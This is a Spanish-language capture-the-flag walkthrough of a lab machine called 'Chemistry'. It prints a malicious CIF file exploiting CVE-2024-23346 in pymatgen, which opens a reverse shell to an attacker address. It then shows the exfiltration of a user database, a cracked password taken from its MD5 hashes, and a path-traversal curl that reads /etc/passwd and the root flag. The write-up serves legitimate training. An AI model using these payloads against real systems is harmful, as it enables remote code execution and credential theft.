Chemistry .cif

Creamos un usuario:

Crystallographic Information FileSe pueden cargar archivos de información cristalográfica CIF ( )

El contenido del archivo de muestra proporcionado es el siguiente

[root@kali] /home/kali/Downloads  
❯ cat example.cif 
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_b    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

CVE-2024-23346
Después de Googlebuscar este CIFdocumento relacionado CVE, encontré esto 👇
- Fallo de seguridad crítico en la biblioteca Pymatgen (CVE-2024-23346) – vsociety (vicarius.io)
- Ejecución de código arbitrario al analizar un JonesFaithfulTransformation creado con fines malintencionados cadena_transformación · Asesoramiento · materialesproject/pymatgen (github.com)
El prototipo POC proporcionado en Github es así

Carga utila para la revershell:

[root@kali] /home/kali/Downloads  
❯ cat example.cif 
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1
 
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.xx.xx/100 0>&1\'");0,0,0'
 
_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Configure el monitoreo, haga clic en Ver después de cargar View, podrá ver el rebote exitoso aShell

Se encontro .db en el directorio /instance:

Lo descargamos para ver que contiene:

app@chemistry:~/instance$ ls
ls
database.db
app@chemistry:~/instance$ python3 -m http.server 9999
python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
10.10.16.50 - - [27/Dec/2024 00:15:40] "GET /database.db HTTP/1.1" 200 -

En nuestra maquina con:

┌──(docker㉿docker)-[~/HackBox]
└─$ wget http://10.10.11.38:9999/database.db

--2024-12-26 19:14:11--  http://10.10.11.38:9999/database.db
Connecting to 10.10.11.38:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/octet-stream]
Saving to: ‘database.db’

database.db            100%[============================>]  20.00K  2.53KB/s    in 7.9s    

2024-12-26 19:14:26 (2.53 KB/s) - ‘database.db’ saved [20480/20480]

Lo podemos ver con:

┌──(docker㉿docker)-[~/HackBox]
└─$ sqlite3 database.db

sqlite> SELECT * FROM user;
1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
4|robert|02fcf7cfc10adc37959fb21f06c6b467
5|jobert|3dec299e06f7ed187bac06bd3b670ab2
6|carlos|9ad48828b0955513f7cf0f7f6510c8f8
7|peter|6845c17d298d95aa942127bdad2ceb9b
8|victoria|c3601ad2286a4293868ec2a4bc606ba3
9|tania|a4aa55e816205dc0389591c9f82f43bb
10|eusebio|6cad48078d0241cca9a7b322ecd073b3
11|gelacia|4af70c80b68267012ecdac9a7e916d18
12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0
13|axel|9347f9724ca083b17e39555c36fd9007
14|kristel|6896ba7b11a62cacffbdaded457c6d92
15|test|098f6bcd4621d373cade4e832627b4f6
16|japannext|736e25a32056154b712c7f6b1aa9ff2e
17|pikachu|9ce44f88a25272b6d9cbb430ebbcfcf1
18|bob123|e499fb20128982ea8bfc10466a7b6576
19|nemo|1ac9ff9503af7a30d2883beabbb5ab4b
20|jose|f717c413cebc560ff181002dbc323431
21|luis10|0bc7bf02e3cdb2d2d45730ff7a5c9c37
sqlite>

Encontré /homeotro usuario en el directorio: rosay database.dbsu contraseña también existe en hash, así que puedo usarla John The Ripperpara descifrar la contraseña.

Obtener contraseña de usuario

username：rosa
password：unicorniosrosados

SSHInicie sesión directamente para obtenerUser.txt

Leer cualquier archivo

Sube linpeas y descubre que hay un puerto de intranet abierto

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                               
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      7928/bash                                                                   
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

Proxy 8080el puerto. Aquí lo proxy al 8000puerto local, porque 8080el puerto es Bursuiteel puerto predeterminado.

Abrimos un tunel dinamico con ssh:

┌──(docker㉿docker)-[~/HackBox]
└─$ ssh -L 8000:localhost:8080 rosa@chemistry.htb

Hay /assetsun directorio, podemos realizar un recorrido de directorio basado en este directorio

Según la prueba del artículo anterior, la lectura es exitosa.

┌──(docker㉿docker)-[~/HackBox]
└─$ curl -s --path-as-is "http://127.0.0.1:8000/assets/../../../../../../etc/passwd"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

┌──(docker㉿docker)-[~/HackBox]
└─$ curl -s --path-as-is "http://127.0.0.1:8000/assets/../../../../../../root/root.txt"

PreviousLinkvortex NextTrickster .git

Last updated 6 months ago

CVE-2024-23346

Leer cualquier archivo